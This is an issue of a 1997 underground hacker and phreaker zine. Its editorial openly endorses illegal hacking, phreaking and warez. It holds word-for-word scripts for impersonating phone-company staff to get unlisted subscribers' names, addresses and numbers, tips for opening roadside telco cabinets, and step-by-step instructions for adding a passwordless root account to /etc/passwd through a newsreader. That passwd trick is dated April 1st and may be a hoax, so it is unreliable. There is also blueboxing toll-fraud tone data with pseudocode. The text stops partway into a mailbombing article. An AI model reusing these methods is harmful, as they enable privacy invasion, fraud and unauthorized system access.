+------------------------------------------------------------------+
|                   The HAVOC Technical Journal                    |
+------------------------------------------------------------------+

Vol. 1 | No.9 | April 1st, 1997 | A HAVOC Bell Systems Publication

"In /dev/null no one can hear you scream." - Redtyde
_____________________________________________________________________________

--=[The HAVOC Technical Journal Issue 9]=--

Editorial..............................KungFuFox
Social Engineering Your RBOC...........KaiserS
Subscriber Loop Concentrators..........Optimus
News passwd hole.......................Scud-O
International Software Blueboxing......memor
TEMPEST................................Optimus
MAPI Mailbombing Part I................Scud-O
FCC Frequency Allocations..............Keystroke
1aESS..................................Optimus
X-Toolz................................lurk3r
TFTP...................................Scud-O
The News...............................KungFuFox
Reader Survey..........................THTJ
IRC Logs...............................Undernet
Phonecalls.............................THTJ

"The internet is the antithesis of control. It redistributes power and undermines control." -Jon Katz, The Netizen
_____________________________________________________________

The HAVOC Technical Journal - Information

- Editor in Chief : Scud-O, foxmulder@worldnet.att.net
- Acting Editor: KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@juno.com
- THTJ website: www.geocities.com/siliconvalley/8805
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784

The HAVOC Technical Journal Vol. 1, No.9, April 1st, 1997. A HAVOC Bell Systems Publication. Contents Copyright (©) 1997 HAVOC Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or in part without the expressed written consent of HAVOC Bell Systems Publishing. [No copying THTJ, damnit.] The HAVOC Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. [Actually, to tell you the honest to goodness truth, we do endorse that stuff. We just don't wanna get in trouble if you try it for yourself and something goes wrong.] "We're building a wired world, but all those wires are crossed. We've had a lot of warnings. Pretty soon, we're going to start having disasters. It's time we started looking harder at the threats." -Simson Garfinkel, Wired Magazine _____________________________________________________________ --------------- --=[Editorial]=-- Written by KungFuFox --------------- When I think about the electronic underground out there, about the warez traders, the phreaks, hackers, crackers, anarchists, and all the others, I see a buncha people who enjoy what they're doing, with good reason. You all have your reasons for residing in the underground community, even if they're really naughty reasons. One thing that all of you share [besides 0-day warez, k0dez, toenz, phone numbers, card numbers, payphones, toilets, hotel rooms,... er, I'm getting off track here] is what I'll call the big picture; it's us against them. Right about now, you're probably thinking that I'm nuttier than a payday candybar, or you may be wanting to know who 'they' are. Yes, I am nuttier, but anyways, that 'us against them' thing is an old cliche, but I'm not a genius so I used it. This simple equation should adequately illustrate who 'they' are: they = evil corporations in the sky. For me, the word corporation conjures up images of an old man sitting at a big desk on the top floor of a skyscraper. 
He's probably staring at some newspaper's stocks & bonds page, and laughing at all the profits that his big evil corporation is raking in, but my imagination isn't that vivid, so I can't be sure what he's doing, maybe he's molesting a napkin, I don't know. Back to my story... That old man isn't interested in how good the customers feel about his corporation's products, and that's not just because he's old, lots of middle aged people have the same problem he's got, and it can't be cured by a 12 step program, like alzhiemers or redbox addiction. His problem is greed, and it's cost him his status as a philanthropist, but who really cares? *WARNING* [If you are a faint hearted retard, the below statement may be lethal. All personal injury claims may be sent to Bell Communications Research Inc., Courtesy of HAVOC Bell Systems, 445 South Street, Morristown, NJ, 07960.] The corporate world of the 20th century isn't about ethics, not good business, it's all about money. [shocking!] There aren't any real political empires out there anymore, because imperialism was deemed unethical by the United States, and we're all well aware that the United States is the most ethical place in the world, right? So naturally something has got to replace the power that political empires used to have, and voila; we get corporate imperialism. If you can't control things with an army, why not just take over wide areas of the economy by owning and producing everything that people buy? Is that what YOU were thinking? Right! So the old man's army of accountants, and marketers, and productions staff, and jackoffs, and asshole managers, and expert lawyers, and enslaved mexican laborers are all set to work building this empire that that old man wants so bad. It's not as simple as that, but I just recently found out that not all of our readers are economists, which really bummed me out. 
What has replaced political imperialism is corporate imperialism, and instead of soldiers being sacrificed in the name of territorial expansion, it's consumers being sacrificed in the name of higher profits. Now being the noble protectors of consumer freedom that we members of the electronic underground are, we've got to do something, right? Well little do you know, you've probably already helped the cause. All attempts at conquering a group of people, may they be military or economic, are met with resistance, and we are that resistance. We each play an important role in this war against corporate imperialism, and we all contribute to the well being of our fellow electronic citizen, whether we realise it, or not. The warez traders slow unfair software company profiteering. Phreaks bypass the ridiculous pricing system of the phone company. Hackers free information for the electronic community. Crackers break down the walls that have been erected for the purpose of profit. And anarchists keep corporations from going about their business as usual. It isn't about who wins or loses, it's how you play the game, right? Well upsetting as it may be, the corporations are cheating, and winning. We are the liberators, the equalizers in a society polarized by gluttonous profiteering. Without us, the world would not be a better place, it could only be worse, and things would basically suck. If you phear the media, because they said we're bad guys, pay close attention: the media is owned by corporations, so they say what that old man at the top of the skyscraper wants them to say. Nothing you see on the news is pure unadulterated goods, because that wouldn't be prudent. Well, the real reason isn't about prudence, I made that up. It IS about making certain aspects of life look good, and others look bad. That's why that old man always makes himself look swell, and blames us evil hacker types for ruining his honest business practices. Unbelievable as it may be, they phear us. 
We're what stands in the way of infinite profits, and wouldn't you know it, that pisses them off. They phear because they don't know who we are, unless they're luck enough to catch us, which isn't as often as it may seem. None of those old men, or anyone that works for them, will ever meet you, or know your real names, and yet you are pheared. The next time you're hacking a shell, or phreaking your grandma, or insulting an OCI operator, or just tradin' some warez, think about who you're hurting, it's not the little guys, they don't have to pay the bills if they don't want to; it's that evil old man. If you have a moral problem hurting old men, just replace the words 'old man' with your favorite corporate executive. I've provided a few examples: Steve Case, Bill Gates, Michael Eisner, or even Bill Clinton, since he rips us off anyway. This editorial is a reminder for those of you who may feel wary of breaking the law, or doing something 'wrong'. Nothing you do is wrong, so long as it's not against a moral opponent, or some innocent bystander who didn't piss you off or give you a good reason like 'he looked stupid'. At least justify it, so when the judge asks you what the hell you were thinking when you pranked the mayor at 3am and insulted his wife's obesity, you can tell him that you were just trying to offer some constructive criticism. At the same time, you shouldn't feel as though the hacker devil will strike you down if you don't help out the cause and fight corporations or something, because that's not why you got into H/P/C/V/A in the first place. You got into it because it was fun, or a challenge, or some other real creative reason. Maybe you wanted to go somewhere that you weren't supposed to go, or maybe it was just about taking risks (and not getting caught). Don't hesitate to admit you don't give a shit about the big picture, because the big picture is boring and stupid, and you just want k0dez, right? 
I'll end this by thanking Scud-O for giving me the opportunity to edit this magazine, and may it live long and prosper. To all of you readers, hopefully you'll come out of this experience with some info that you can use in all of your underground adventures, and maybe you'll enjoy reading it at the same time. [If you haven't noticed already, I made a few format changes, so don't panic... this is the same magazine.] All questions, comments, and good stories may be emailed to me at: mazer@cycat.com "...there is no scenario that I can see where a system-wide failure of networks would occur due to the internet." -Tim Harmsen, CEO of Digital Vision Communications _____________________________________________________________ ---------------------------------- --=[Social Engineering Your RBOC]=-- Written by KaiserS ---------------------------------- There are several areas that can be included, or described as "phreaking", in this article, I will discuss some basics of social engineering, perhaps one of the best ways to accomplish large tasks in a small amount of time (without hacking, and jailtime). For those of you who do not know what social engineering is, let me give you a brief rundown... Social engineering involves taking on the identity of, in this case a bell employee, in order to make yourself appear to be an inside bell employee, and get information that is not publicly available, or, in extreme cases, add/move/change service, or disconnect service altogether. One of the best things to have when you begin is not knowledge, but rather, a deep radio voice...you need to sound like you are "ON AIR" (it makes the bell ladies that work the desk jobs swoon).... Well...enough with the intro... Social engineering unlisted name/address info from a telephone number only, or, the unlisted telephone number from name and address. FIRST! 
You need to have a technical number like the ICSC/ICMC, call information, and ask for REPAIR...then call repair, and say that you have a private line circuit that is down, and you need the IC repair number... Once you have that number, you are homefree! Call the IC Repair number, and act like you have reached the wrong number: Hello? what center have I reached?? The interexchange carrier maintenance center (ICMC) OH! I am sorry, would you please transfer me to MLAC, or the LDMC, and give me the number before you do in case I drop off. Sure, (searching through a phonelist) (they may have it listed under FACS) I cant find it... Well, I need to speak to someone who works FACS, or PREMIS Ah, here it is... I will not be giving out those numbers in this article...if you cannot get this far...well:) Once you have MLAC, or the LDMC... Call them! Getting unlisted address/name info from a telephone number... Hi, this is Dan (any name) at the frame of the ANYTOWN01 (usually it will be "the town the # is in", and "01, 02, 03, 11, or, 12, i.e., Garrison11) I need you to go into FACS, and pull 200 555-1234 OK, what do you need? can you pull the address, and binding post information?? Sure... she will give you the address, and several long, hyphenated numbers...these designate where the pair s located in the terminal (b-box) Great, do you have SORD?? Yes. Can you pull the subscriber name? Yes, I see it listed as : Joe Blow...or whatever:) thank you, have a good day. Getting unlisted number/numbers from an address... Call MLAC again... Hi, this is Dan (any name) at the frame of the ANYTOWN01 I need you to go into PREMIS, and pull 123 Main Street, Anytown USA. OK, what information do you need? I need all lines terminated at that PREM LOC. OK, I see two lines terminated there, they are...(she will give you the telephone numbers) Thank you, and have a good day... 
Now, I will explain some of the terminology I used:

MLAC   = Mechanized Loop Assignment Center
LDMC   = Loop Distribution and Maintenance Center (same as MLAC)
FACS   = Facilities Administration Computer System
PREMIS = Doesn't have a neat acro (that I know of). Maintains records by premises info
SORD   = Service ORDer system

Well, that's it for this writing...hope this can be put to good use, as this is one of the best ways to start out. There are many other things (neat tricks) that can be accomplished through these same centers, but this is a start, and will be quite an asset.
_____________________________________________________________

-----------------------------------
--=[Subscriber Loop Concentrators]=--
Written by Optimus
-----------------------------------

The Universal SLC (Subscriber Loop Concentrator) has two main parts, the Central Office Terminal (COT) and the Remote Terminal (RT), commonly connected by a T1 digital line or optical fiber connection. The COT and RT are composed of four shelves labeled alphabetically. Each shelf has twenty-four channels. In an integrated SLC system, the COT is replaced by the Digital Carrier Line Unit (DCLU) in a 5ess or similar switch. A SLC with a Feature Package B (FPB) can interface to a SLC COT, DCLU, Subscriber Loop Interface Module (SLIM) and a LM12 Multiplex.

The most common SLC system is the Series 5. The Series 5 is based on two independent 96-line systems that are packaged into one 5 shelf, dual bank assembly. The Bank Control Unit (BCU) and Alarm Display Unit (ADU) monitor for system failures within the SLC system, and its interface. If something goes wrong on either end, the other end is notified via the Alarm Interface Unit (AIU).

An important thing to mention is that many SLC systems have an alarm function called DLR ALM, which was conveniently spelled out on a 51a SLC for me as a Door Alarm.
The particular 51a had a small round piece of metal protruding from the upper right hand corner, which would be held in when the door was closed and consequently pop out when the door opened. After 30 seconds of this metal being out, the DLR ALM light would light. This is undocumented in all of the many SLC related manuals I have in my possession, but from logic, when tripped, the ADU on the COT or related interface at the CO is probably notified.

SLC's are fairly easy to spot, usually stored in a 51a, 80d or 80e cabinet, or frame mounted within a 16 or 24 foot CEV (Controlled Environment Vault), PCH (Pre-cast Concrete Hut) or inside a customer's location.

The 51a is usually a slate or gray colored cabinet mounted off the ground on either a pole or a pedestal. The 51a has two sections that open. The front section, the Electronics Section, contains the power shelf, fan unit, one dual channel bank which I mentioned earlier (allowing up to 192 subscriber loops (pots)) and the protection panel (following the phone company's usual standard of high power protection). The ADU device is usually either a card mounted in the Channel Bank or a separate unit placed on top of the fan or power shelves. The back section, the Battery Section, contains power backup equipment and batteries to keep the SLC running in case its direct power connection fails or the area has a blackout. These sections are designed to only be opened with a common allen wrench with a hole drilled down the middle of it, but can commonly be opened with a good pair of needle-nose pliers.

The 80D RT housing is more slender but wider than the 51a, usually a dark brown color with a white frame. The size of the 80D allows most areas to be reached from either the front or the back. The exception to this is on the front, where you have access to the AC power panel and outlets. Opposite these on the back is the main splice for your cabling, a sort of miniature cable vault.
It is common to find these equipped with a fiber feed, which replaces a channel bank on the back with a fiber multiplexer, allowing only three dual channel banks supporting 576 subscriber loops (pots). When not equipped with a multiplexer, the 80D contains 4 dual channel banks (768 subscriber loops (pots)). I have never opened an 80D, but have been told it takes one of the two basic telco keys, a 3/8ths or a 5/16ths hex driver (found on a Can/Cam wrench). 80D's are always pad mounted.

The 80E is basically an extra large 80D, allowing 8 dual channel banks, supporting 1536 subscriber loops (pots) unless fed by a fiber link which, as in the 80D, replaces a dual channel bank with a multiplexer, which I would believe should be the feed of choice for every installation of this system. I've never seen one of these, but they must be pretty badass from what I've read about them. These are also capable of containing T1 repeater shelves for T1 extensions. The 80E is also pad mounted. The battery compartment on the 80E is kept on the very bottom of the unit.

The front and back of the 80E are divided into four columns. The front left side contains the AC interface, as the back left side is, as is general in 80 SLC's, the splicing area. The rest of the back of the 80E is dual channel banks with the exception of an unknown device in the upper right hand corner, probably relating to the lightguide equipment opposite it. The two middle columns on the front of the 80E contain two dual channel units and the ringing, rectifier and other misc shelves. The right column on the front is where the lightguide (fiber optic feed) equipment is kept when using a fiber feed, or another dual channel bank if not.

If you ever get into a CEV or a PCH, the SLC system is arranged much the same, just to a larger extent. The PCH's will usually contain 30, 36 or 40 dual channel banks, depending on the PCH size and the type of feed.
The CEV's will usually contain 20, 24, 30 or 36 dual channel units depending on the same specifications.

I have more information on other SLC cards and systems if you need something specific. This information will hopefully give you a general idea of what these boxes you see on the sides of the road are and what they do.

Basic Data Encoding

The simplest form of the data transfer method on a digital line is a bit. A bit is either a zero or a one, zero being off and one being on. Eight bits make up a byte. One byte represents a single digital character. An example is the letter "A", which in binary would be "01000001".

A T1 digital line (also known as a 1.5, T-1, T-Span, T-Line, DS-1) is a digital line capable of transmitting voice, data, video and computer information at a rate of 1,544,000 Bits Per Second (BPS) (1.544 Mbps).

A pulse (also known as a one or a mark) is the electrical positive or negative signal sent across a digital line.

A No Pulse (also known as a zero or a space) is when there is no electrical signal present on the digital line.

A Bi-Polar Return To Zero (RZ), also called an AMI, is one of the simplest protocols for a T1 line. The electronic signal blips into a positive or negative charge, both representing a transmission pulse. Between each 'blip' the signal returns to zero voltage for a short period of time, not being long enough to be recognized as a Non Pulse Bit (NPB). If the signal stays at zero through the allotted time slot, it is then recognized as a NPB transmission.

A logic error or a bit error is when a bit is transmitted in one position and received in another. For example, a one is received where a zero was sent. This is common, and brought on the creation of CRC checking for the digital line.

A Bi-Polar Violation (BPV) is when two ones are transmitted consecutively on the same side of a zero.
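The AMI coding and bipolar-violation check described here, together with the B8ZS substitution and frame arithmetic this article defines further on, as an added example (not part of the original article). Function names and the sample bit strings are constructed for illustration; the starting polarity `last` is an assumption the caller supplies.

```python
# Added example: AMI / B8ZS line coding as used on a T1 span.
# Symbols are +1 (positive pulse), -1 (negative pulse) and 0 (no pulse).

FRAME_BITS = 24 * 8 + 1      # 24 channels x 8 bits + 1 framing bit = 193
T1_BPS = FRAME_BITS * 8000   # 8000 frames per second


def render(symbols):
    """Show a symbol list the way the article writes it, e.g. 000+-0-+."""
    return "".join("+" if s > 0 else "-" if s < 0 else "0" for s in symbols)


def ami_encode(bits, last=-1):
    """Plain AMI: a zero is no pulse, each one flips the pulse polarity."""
    out = []
    for b in bits:
        if b:
            last = -last
            out.append(last)
        else:
            out.append(0)
    return out


def find_bpvs(symbols):
    """Indexes of pulses that repeat the polarity of the previous pulse."""
    hits, last = [], 0
    for i, s in enumerate(symbols):
        if s:
            if s == last:
                hits.append(i)
            last = s
    return hits


def longest_zero_run(symbols):
    """Longest stretch without a pulse (what the ones-density rule limits)."""
    best = run = 0
    for s in symbols:
        run = run + 1 if s == 0 else 0
        best = max(best, run)
    return best


def b8zs_pattern(last):
    """Substitute for eight zeros: two deliberate violations (positions 3, 6)."""
    return [0, 0, 0, last, -last, 0, -last, last]


def b8zs_encode(bits, last=-1):
    """AMI, but every run of eight zeros is replaced by the B8ZS pattern."""
    out, i = [], 0
    while i < len(bits):
        if bits[i:i + 8] == [0] * 8:
            out += b8zs_pattern(last)   # pattern ends on polarity `last`
            i += 8
        else:
            if bits[i]:
                last = -last
                out.append(last)
            else:
                out.append(0)
            i += 1
    return out


def b8zs_decode(symbols, last=-1):
    """Return (bits, error_indexes): B8ZS patterns become eight zeros,
    any other bipolar violation is reported as a line error."""
    bits, errors, i = [], [], 0
    while i < len(symbols):
        if symbols[i:i + 8] == b8zs_pattern(last):
            bits += [0] * 8
            i += 8
            continue
        s = symbols[i]
        if s:
            if s == last:
                errors.append(i)
            last = s
        bits.append(1 if s else 0)
        i += 1
    return bits, errors


if __name__ == "__main__":
    data = [1, 0, 1] + [0] * 16 + [1]          # constructed sample
    print("AMI :", render(ami_encode(data)))
    print("B8ZS:", render(b8zs_encode(data)))
    print("decoded ok:", b8zs_decode(b8zs_encode(data)) == (data, []))
```

A receiver that only counts raw violations with `find_bpvs` will report the deliberate B8ZS pulses as errors, which is why the decoder strips the substitution pattern before flagging anything.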
Simply put, it is when two positive or negative ones are received one after the other, when under normal circumstances, the bits would alternate polarity.

After one-hundred and ninety-two prior bits are sent across the twenty-four channels of a T1, a framing bit is sent, making it the one-hundred and ninety-third bit. This is used to identify the end of a bit segment. So if each of the twenty-four channels sends eight bits, making one-hundred and ninety-two, plus the framing bit, that one-hundred and ninety-three multiplied by 8000 (the approximate number of segments sent per second) gives us 1,544,000 bps, our T1 line.

B8ZS - Binary Eight Digit Zeroes Substitution. B8ZS allows a T1 subscriber to follow T1 Tariff requirements which do not allow fifteen consecutive zero bits. B8ZS takes a full 0 byte and changes it to look like "000+-0-+", which would be "00011011" without polarity.

Customer Service Unit (CSU) - Equipment connected at the customer end of a 1.5 circuit

Channel Service Unit (CSU) - Same as above

Network Interface Unit (NIU) - Placed on the customer end of a 1.5 circuit to facilitate testing of the circuit.

D-4 Bank - A Multiplexer that combines 24 voice channels into a single digital output signal, 1.5mbps

Extended Super Frame (ESF) - One quarter of the bits are used to frame a digital transmission.

Digital Service Classifications:

DS0        - 64 kbps      - 1 Voice Circuit
DS1/T1     - 1.544 mbps   - 24 Voice Circuits
DS1C/T1C   - 3.152 mbps   - 48 Voice Circuits
DS2/T2     - 6.312 mbps   - 96 Voice Circuits
DS3/T3/LT  - 44.736 mbps  - 4672 Voice Circuits
DS3C/LW    - 89.472 mbps  - 1344 Voice Circuits
DS4/LW     - 274.176 mbps - 4032 Voice Circuits
DS5/FT"G"  - 1667 mbps    - 24192 Voice Circuits

Optimus
_____________________________________________________________

----------------------
--=[News passwd hole]=--
Written by Scud-O
----------------------

While setting up my news server, I was experimenting, and I have discovered a very huge hole that will be causing some sysadmins some sleepless nights.
What follows below are the steps to not only read, but access and append any number of accounts to the /etc/passwd.

1. Set your NNTPSERVER environment variable

Usually, this is set to whatever you or your ISP use as the news server. Anyhow, change it to the localhost name so you are using the local server as news host.

Ex:
NNTPSERVER=news.digex.net ; export NNTPSERVER
would go to
NNTPSERVER=limbo ; export NNTPSERVER
since limbo is my local host. Or you can just modify the /etc/nntpserver if you want to be different.

2. Create/Modify your .newsrc file

Add the following 'newsgroup' to the file and keep it as the only one:

/.etc.passwd

3. Either run trn -r or tin to read the 'news'

Ex:
tin -r
tin 1.2 PL2 [UNIX] (c) Copyright 1991-93 Iain Lea.
Connecting to limbo...
Reading news active file...
Reading attributes file...
Reading newsgroups file ...
--- etc ----

And you should see your password file, with each line being a different article.

4. Or, better yet, use trn and post an 'article'

While you are running trn and reading a 'news' article, press f. It will then prompt you with:

Are you starting an unrelated topic? [ynq]

Well, type y, since otherwise you can REALLY mess up the passwd file! Next the news reader will prompt you for the subject and distribution. Enter the following:

Subject: ignore no reply
Distribution: na

If you are wondering what the 'ignore no reply' is for, it is so that the server will not mail you back saying the message has been posted, which otherwise could point you out to the sysadmin if he views any logs! The distribution basically tells the servers that this is only to be sent to 'na' or North America. This line really doesn't matter, but nntp can and will be picky about this.

Now trn will spit some stuff out at you and you should finally get to where it asks you which editor to use to edit the message. The default should be vi, and if it is not I would change it to vi, unless you wish to use another editor.
Ex:
Newsgroups: /.etc.passwd
Subject:
Summary:
Expires:
Sender:
Followup-to:
Distribution: na
Organization:
Keywords:
Cc:

rewtbeer::0:1:i like rewt beer:/home/rewt:/bin/sh

When you are finished typing this all in, save it with :wq. trn will then show you the name and info about the 'newsgroup' you are sending to:

Your article's newsgroup:
/etc.passwd
Check spelling, Send, Abort, Edit, or List? s

Type s to send out your article. trn will then return to the article you were reading. Press q to exit and go login to your new shell!

How it works:
^^^^^^^^^^^^^
Ok, now this may sound kind of crazy, but the nntp stores news in a standard directory pattern. This only makes sense, since this is the easiest way to do things. Now, since you throw in the / in the newsgroup, nntp moves from its regular directory to the root directory. Then with the 'etc' it moves to /etc, and with the final 'passwd' nntp realizes that this is a file, not a directory, and it opens it up for writing/reading/appending.

So anyway, have fun, and next April 1st I hope you will look for my article on how the impending sale of Netscape to HAVOC Bell Systems may spell certain doom for Microslut.
_____________________________________________________________

---------------------------------------
--=[International Software Blueboxing]=--
Written by memor
---------------------------------------

When you don't have any technical skills in electronics, like you don't know how to calculate U=RI or when you think AC is Asynchronous Christians, you have to use a Software Bluebox... That program generates the well known 2600 Hz Tone, KP Tone (Key Pulse), ST Tone (Start) and the MF (Multi-Frequencies 700Hz-1100Hz) tones.

2600 Hz is normally the tone which makes the free call possible. It's a MF, composed of two frequencies during a lapse of time. The old and typical tone is..
Tone1 Frequency 1 = 2600Hz Frequency 2 = 2400Hz Length = 150ms Delay = 10ms Tone2 Frequency 1 = 2400Hz Frequency 2 = 2400Hz Length = 300ms Delay = 10ms After, you'll have to dial the KP-#Number-ST .. KP enables the MultiFrequency Receiver, ST is the tone that means the call is completed. Well, we never used to seize a french local phone number.. too dangerous, or when calling a french local phone number, we have to pay something. Like I can try to bluebox on (33) 0380293031 , trying to seize the phone line, with an old 2600Hz.. But when I dial and complete the call for some foreign country (B01xxxxxxxxxC) I will still pay the call... Me -> (33)0380293031 (an Average of 0.26FF/Min .. US$1==5FF) but well the (33)0380293031 will pay (33)0380293031 -> B01xxxxxxxxxC (a lot of $$) And the other problem is that (33)0380293031 is a Hospital, and the callers are logged.. France Telcom has enough equipment for using a Bluebox Fraud detection, and they use it for protecting French numbers against Fraud Attempts and for busting kiddie phreakers. So I personally use operators numbers, which are free for calling some CCS (calling card services) in USA, Japan, UK, Austria, Sweden, Finland,... (like the phone numbers I gave in bif2.txt) Well I have to scan for finding the 2600Hz tones.. It can be for example: Coloumbia CCS Tone1 Frequency 1 = 2650Hz Frequency 2 = 2450Hz Length = 170ms A delay between those 2 tones.. Delay = 10ms Tone2 Frequency 1 = 2450Hz Frequency 2 = 2350Hz Length = 330ms Delay = 10ms and after I dial the Kp-#Number-St dialing : B01219555555C and well i'll pay Me->Coloumbia CCS ... US$0 and Coloumbia CCS will pay Coloumbia CCS->B01219555555C ... 
a lot of $$ There is a little algorythm for scanning the 2600Hz ***************************************************************************** F1Interval1 is the Begin Frequencie1 \ Tone1 F2Interval1 is the Begin Frequencie2 / with Lenght1 F1AInterval1 is the Begin Frequencie1\ Tone2 F2AInterval1 is the Begin Frequencie2/ with Lenght3 F1Interval2 is the End Frequencie1 \ Tone1 F2Interval2 is the End Frequencie2 / with Lenght2 F1AInterval2 is the End Frequencie1\ Tone2 F2AInterval2 is the End Frequencie2/ with Lenght4 Delay is the delay between the 2 tones.. Default Value is 10ms, but u can still change it. ***************************************************************************** Procedure Scanning(F1interval1,F2interval1,F1interval2,F2interval2, Delay,F1AInterval1,F2AInterval1,F1AInterval2,F2AInterval2,Lenght1,Lenght2,Lenght3,Lenght4) Define F1interval1,F2interval2,F1AInterval1,F2AInterval1,Lenght1,Lenght2 Integer Define F1Ainterval2,F2AInterval2,Lenght3,Lenght4 Integer Define Delay Integer = 10 Define a,b,c,Testin,FirstCoolTone,SecondCoolTone,FirstCoolLenght,SecondCoolLenght Integer Define FirstCoolTone1,SecondCoolTone1 Integer /* It is the scan of the 1st Tone */ ask for &F1interval1,&F1interval2,&F2interval1,&F2interval2,&Lenght1,&Lenght2,&Delay a=F1interval1 c=F2interval1 a=a-1 c=c-1 while(c!=F2interval2 and Testin!=1) c=c+1 while(a!=F1interval2 and Testin!=1) a=a+1 b=Lenght1 while(b!=Lenght2 and Testin!=1) Sound(Voice1,b,a) Sound(Voice2,b,c) ask for a 1/0 in Testin /*is the Tone seems well.*/ b=b+1 EndWhile wait(Delay) EndWhile EndWhile FirstCoolTone=a FirstCoolTone1=c FirstCoolLenght=b Wait(Delay) Testin=0 /* It is the scan of the 2nd Tone */ ask for &F1Ainterval1,&F1Ainterval2,&F2Ainterval1,&F2Ainterval2,&Lenght3,&Lenght4,&Delay a=F1Ainterval1 c=F2Ainterval1 a=a-1 c=c-1 while(c!=F2Ainterval2 and Testin!=1) c=c+1 while(a!=F1Ainterval2 and Testin!=1) a=a+1 b=Lenght3 while(b!=Lenght4 and Testin!=1) Sound(Voice1,b,a) Sound(Voice2,b,c) ask for a 1/0 in Testin 
/*is the Tone seems well.*/ b=b+1 EndWhile wait(Delay) EndWhile EndWhile SecondCoolTone=a SecondCoolTone1=c SecondCoolLenght=b Wait(Delay) /*Display The Cools Tones And Time*/ Write(1st cool Tone.. F1: %FirstCoolTone f2: %FirstCoolTone1 lenght: %FirstCoolLenght) Write(2st cool Tone.. F1: %SecondCoolTone f2: %SecondCoolTone1 lenght: %SecondCoolLenght) End. ***************************************************************************** There is a little algorythm for seizing with 2600Hz ***************************************************************************** F11 is the Begin Frequencie1 \ Tone1 F21 is the Begin Frequencie2 / with Lenght1 F12 is the End Frequencie1 \ Tone1 F22 is the End Frequencie2 / with Lenght2 ***************************************************************************** Procedure Dialing(F11,F21,Lenght1,F12,F22,Lenght2,Delay) /* Dialing Procedure */ ClearScreen Write(Dialin') ask &F11,&F21,&Lenght1,&Delay,&F12,&F22,&Lenght2,&Delay /*1st Tone*/ Sound(Voice1,Lenght1,F11) Sound(Voice2,Lenght1,F21) /*Waitin Delay*/ Wait(Delay) /*2nd Tone*/ Sound(Voice1,Lenght2,F12) Sound(Voice2,Lenght2,F22) /*Waitin Delay*/ Wait(Delay) ***************************************************************************** How To Bluebox for connecting a network, using a modem. ------------------------------------------------------- In the first place, you must plug the PhonePlug and the ModemPlug like so.. ______ _____ _____ Wall | | | | | In/Out| /___|Modem| /____ |Phone| Phone | \¯¯¯|Plug | \¯¯¯¯ |Plug | Line | |_____| |_____| ¯¯¯¯¯¯ | | To The Computer.:' ':.To The Computer Speakers You must prepare your Software Bluebox and your fav Terminal in 2 tasks (Win3.1x,95,nt + DOS) Task1:Bluebeep.exe (Msdos (Alt+Tab) ) Task2:Term.exe (Win3.11) now.. prepare your modem: ATZ OK To catch the carrier when you'll have it, the command ATD will be cool, ATD is for dialing (D=Dialing) , but ATD alone catch the Modem Carrier. ATDT3336431515 <- Don't prepare that.. 
Wrong
ATD <- Right String

Switch the task to the BlueBox system, phone your operator number, seize,
activate the multi-frequencies receiver with KP, dial # number in MF; the
call is completed with ST. When you hear the beep and the carrier autoanswer
of the targeted modem.. for example, call the 3615 Teletel French Network >>
Dial : B03336431515C, switch the task to your fav terminal and press
Return..

ATZ
OK
ATD
Connect 1200
^A Teletel Network 3615 3614 3613 ^C
Nom du service:....................................

_____________________________________________________________

  -------------
--=[TEMPEST]=--
Written by Optimus
  -------------

For those of you who already know a lot about TEMPEST, skip this and email me
all you know, otherwise, read on...

TEMPEST stands for Transient Electromagnetic Pulse Standard. Tempest is a
code name the government created to define their electromagnetic radiation
protection program. The government still maintains that Tempest monitoring
does not exist, although millions of dollars go towards this program and many
people have proven it to be an actual threat.

In 1985, Wim van Eck, a Dutch scientist, published a paper concerning the
threats of tempest eavesdropping. This paper caused a stir in many government
agencies, and it was immediately classified. Most tempest information remains
classified to this day, and is not available to anyone who is not a certified
tempest security consultant. This is the reason for the scarce amount of
information out there on tempest (sometimes known as van Eck) monitoring.

For a device to be TEMPEST certified, that is, approved as letting out no
electromagnetic radiation, or only a largely insubstantial amount, it must
comply with NACSIM 5100A. This document happens to be classified by the NSA
though, so a lot of good it does the normal citizen.

The basis behind TEMPEST is that everything emits electromagnetic charges.
When the power level behind these charges changes, they emit electromagnetic
pulses that transmit low level radio waves. The challenge is to pick up these
radio waves and reconstruct them into a form readable and usable by the
receiver.

This is just a small tidbit of information on TEMPEST. Most of this
information I've learned from TheCodex, a company providing information on
surveillance and counter-surveillance. You can find them on the web at
http://www.thecodex.com.

Optimus

_____________________________________________________________

  -----------------------------
--=[MAPI Mailbombing Part I]=--
Written by Scud-O
  -----------------------------

I. Introduction of MAPI
^^^^^^^^^^^^^^^^^^^^^^^^

Ever since Microslut released the MAPI for Win 3.1, adding and sending mail
to and from applications has been a breeze, and Win95's integration of MAPI
has only helped it. Just look at your Windows 95 desktop, and you will see
Microsoft Exchange, probably the most popular mail program for w95. Microsoft
has also made it a requirement for a program to have some form of MAPI to
receive a Windows 95 Logo.

Anyway, MAPI stands for Messaging Applications Programming Interface. It is
used by programmers to add basic and advanced mail capabilities to a program,
and MAPI is part of Microslut's Windows Open Services Architecture (WOSA),
which is basically a set of common APIs for distributed computing.

II. The MAPI APIs & Architecture
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

There are 3 main MAPI APIs. The first one, Simple MAPI, is the most commonly
used API, and is the API we will mostly be using. The Common Messaging Calls
API (CMC) has also been developed as a platform independent replacement for
MAPI (but so far I don't see the internet moving in hordes to adopt it.) It
contains about 10 basic calls for basic messaging. And finally, there is the
big daddy of them all, the Extended MAPI.
It is a large API with many calls that are still being developed, and are
mainly for messaging only apps, like Exchange or a Mail Server.

Figure I
^^^^^^^^
Basic MAPI Architecture

 Messaging Aware Apps    Messaging Enabled Apps     Messaging Based Apps
          ^                         ^                         ^
          |                         |                         |
+-------------------------------------------------------------------------+
|         |                         |                         |           |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   |
|   Simple MAPI       CMC       Extended MAPI       OLE Messaging         |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   |
|                          Messaging Subsystems                           |
|     +-------------------------------------------------------------+     |
|     |                        Extended MAPI                        |     |
|     +-------------------------------------------------------------+     |
+-------------------------------------------------------------------------+
          |                         |                         |
          ^                         ^                         ^
Message Store Provider        Address Book           Transport Provider
                                Provider

Service Providers
^^^^^^^^^^^^^^^^^

The service providers are the components of MAPI that collectively implement
MAPI service on a system. The three types are Message Stores, Address Book,
